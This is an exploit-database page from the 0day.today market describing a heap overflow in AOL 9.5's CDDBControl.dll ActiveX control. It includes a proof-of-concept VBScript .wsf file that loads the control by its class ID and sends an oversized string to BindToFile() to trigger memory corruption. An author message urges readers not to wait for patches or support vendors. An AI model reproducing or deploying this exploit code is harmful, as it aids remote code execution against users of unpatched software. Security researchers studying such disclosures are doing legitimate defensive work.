[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

AOL 9.5 ActiveX Heap Overflow Vulnerability

Author
Hellcode
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-10134
Category
remote exploits
Date add
19-01-2010
Platform
unsorted
===========================================
AOL 9.5 ActiveX Heap Overflow Vulnerability
===========================================

Product:
 
AOL 9.5
 
Vulnerability:
 
ActiveX - Heap Overflow
 
Discussion:
 
Vulnerability is in Activex Control ("CDDBControl.dll")
Sending a string to BindToFile() , triggering the vulnerability.
Successful exploitation allow remote attackers to execute arbitrary code.
 
 
L4stW0rdZ: "hi francis, do you think we forget you ??? ofcourse not, dont wait patch, dont support vendors
and security industry ...." - mkey
 
---------------
PoC .wsf script:
 
<package><job id='DoneInVBS' debug='false' error='true'>
 
<object classid='clsid:BC8A96C6-3909-11D5-9001-00C04F4C3B9F' id='target' />
 
<script language='vbscript'>
 
 
arg1=String(4000, "A")
arg2=1
 
target.BindToFile arg1 ,arg2
 
</script>
</job>
</package>



#  0day.today [2024-11-15]  #